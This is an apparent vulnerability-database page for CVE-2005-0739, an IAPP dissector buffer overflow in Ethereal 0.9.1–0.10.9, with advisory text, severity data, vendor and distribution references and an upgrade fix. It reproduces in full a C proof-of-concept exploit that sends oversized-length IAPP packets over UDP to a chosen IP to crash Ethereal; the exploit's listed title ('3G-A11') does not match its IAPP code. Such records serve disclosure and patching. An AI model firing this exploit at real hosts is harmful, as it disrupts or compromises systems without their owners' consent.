CVE-2005-0739
CVSS5.0
Published: 2005-05-02 00:00:00
Last revised: 2016-10-17 23:14:06
NMCOE    

[Original] The IAPP dissector (packet-iapp.c) for Ethereal 0.9.1 to 0.10.9 does not properly use certain routines for formatting strings, which could leave it vulnerable to buffer overflows, as demonstrated using modified length values that are not properly handled by the dissect_pdus and pduval_to_str functions.


[CNNVD] Ethereal IAPP dissector buffer overflow vulnerability (CNNVD-200505-409)

The IAPP dissector in Ethereal 0.9.1 through 0.10.9 does not properly use certain routines for formatting strings, which results in a buffer overflow vulnerability. A length value carried in a network packet can overwrite a static buffer.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CWE (weakness category)

CWE-189 [Numeric Errors]

- CPE (affected platforms and products)

Product and version information (CPE) not yet available

- OVAL (technical details for detection)

oval:org.mitre.oval:def:9687 The IAPP dissector (packet-iapp.c) for Ethereal 0.9.1 to 0.10.9 does not properly use certain routines for formatting strings, which could l...
*OVAL describes in detail how this vulnerability is detected; the related OVAL definition contains further technical details on detecting it.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0739
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-0739
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200505-409
(official data source) CNNVD

- Other links and resources

http://anonsvn.ethereal.com/viewcvs/viewcvs.py?view=rev&rev=13707
(UNKNOWN)  MISC  http://anonsvn.ethereal.com/viewcvs/viewcvs.py?view=rev&rev=13707
http://marc.info/?l=bugtraq&m=111066805726551&w=2
(UNKNOWN)  BUGTRAQ  20050312 Ethereal remote buffer overflow #2
http://security.lss.hr/index.php?page=details&ID=LSS-2005-03-05
(UNKNOWN)  MISC  http://security.lss.hr/index.php?page=details&ID=LSS-2005-03-05
http://www.debian.org/security/2005/dsa-718
(PATCH)  DEBIAN  DSA-718
http://www.ethereal.com/appnotes/enpa-sa-00018.html
(PATCH)  CONFIRM  http://www.ethereal.com/appnotes/enpa-sa-00018.html
http://www.gentoo.org/security/en/glsa/glsa-200503-16.xml
(UNKNOWN)  GENTOO  GLSA-200503-16
http://www.mandriva.com/security/advisories?name=MDKSA-2005:053
(UNKNOWN)  MANDRAKE  MDKSA-2005:053
http://www.redhat.com/archives/fedora-legacy-announce/2006-January/msg00003.html
(UNKNOWN)  FEDORA  FLSA-2006:152922
http://www.redhat.com/support/errata/RHSA-2005-306.html
(UNKNOWN)  REDHAT  RHSA-2005:306
http://www.securityfocus.com/bid/12762
(UNKNOWN)  BID  12762

- Vulnerability information

Ethereal IAPP dissector buffer overflow vulnerability
Medium severity  Buffer overflow
2005-05-02 00:00:00 2005-10-20 00:00:00
Remote
The IAPP dissector in Ethereal 0.9.1 through 0.10.9 does not properly use certain routines for formatting strings, which results in a buffer overflow vulnerability. A length value carried in a network packet can overwrite a static buffer.

- Advisories and patches

The vendor has released an upgrade patch that fixes this security issue; it can be obtained from:
        http://www.ethereal.com/download.html

- Vulnerability information (874)

Ethereal <= 0.10.9 "3G-A11" Remote Buffer Overflow Exploit (2) (EDBID:874)
windows dos
2005-03-12 Verified
0 Leon Juranic
N/A
/*
 * 
 * Ethereal IAPP remote buffer overflow #2 PoC exploit 
 * ---------------------------------------------------
 * To test this vulnerability on windows, try to send 3-10 packets 
 * that will trigger the crash, and scroll between captured packets
 * in Ethereal.
 * 
 * Coded by Leon Juranic <ljuranic@lss.hr> 
 * LSS Security <http://security.lss.hr/en/>
 * 
 */ 

#include <stdio.h>
#include <string.h>   /* memset, strncpy */
#include <windows.h>  /* Winsock (sockaddr_in, sendto, inet_addr) */

#pragma comment (lib,"ws2_32")

#define IAPP_PDU_SSID 0

/* IAPP header as the dissector reads it: one version byte, one type byte */
typedef struct _e_iapphdr {
        unsigned char ia_version;
        unsigned char ia_type;
} e_iapphdr;


/* PDU header: type byte followed by a 16-bit big-endian length */
typedef struct _e_pduhdr {
	unsigned char pdu_type;
	unsigned char pdu_len_h;
	unsigned char pdu_len_l;
} e_pduhdr;


void xp_sendpacket (char *pack)
{
	WORD wVersionRequested;
	WSADATA wsaData;
	int err;
	int sock,i;
	struct sockaddr_in sin;
	unsigned char buf[2000];
	char bla[2000];
	e_iapphdr *iapp;
	e_pduhdr *pdu;

	wVersionRequested = MAKEWORD( 2, 2 );
	err = WSAStartup( wVersionRequested, &wsaData );
	if ( err != 0 ) {
		printf ("error!!!\n");
		ExitProcess(-1);
	}

	sock=socket(AF_INET,SOCK_DGRAM,0);

	memset (&sin,0,sizeof(sin));
	sin.sin_family=AF_INET;
	sin.sin_addr.s_addr = inet_addr(pack);
	sin.sin_port = htons(2313);   /* IAPP UDP port */

	iapp = (e_iapphdr*)&buf;
	iapp->ia_version = 1;
	iapp->ia_type = 1;
	
	pdu  = (e_pduhdr*)(buf+2);
	pdu->pdu_type = 3; 
	/* oversized PDU length field (0x05a1): the unchecked length value
	 * described in the advisory */
	pdu->pdu_len_h = 0x05;    
	pdu->pdu_len_l = 0xa1;
	
	memset (bla,'\xfc',1300); 
	strncpy ((char*)&buf+sizeof(e_iapphdr)+sizeof(e_pduhdr),bla,2000);
	
//	for (i=0;i<1000;i++)
	sendto (sock,(char*)buf,1489,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));

}


int main (int argc, char **argv)
{
	if (argc < 2) {
		printf ("usage: %s <ip>\n", argv[0]);
		return 1;
	}
	xp_sendpacket(argv[1]);
	return 0;
}

// milw0rm.com [2005-03-12]

- Vulnerability information

14667
Ethereal IAPP Dissector Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2005-03-11 Unknown
Unknown Unknown

- Solution

Upgrade to version 0.10.10 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- Related references

- Vulnerability author

Unknown or Incomplete


Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are maintained on MITRE's websites.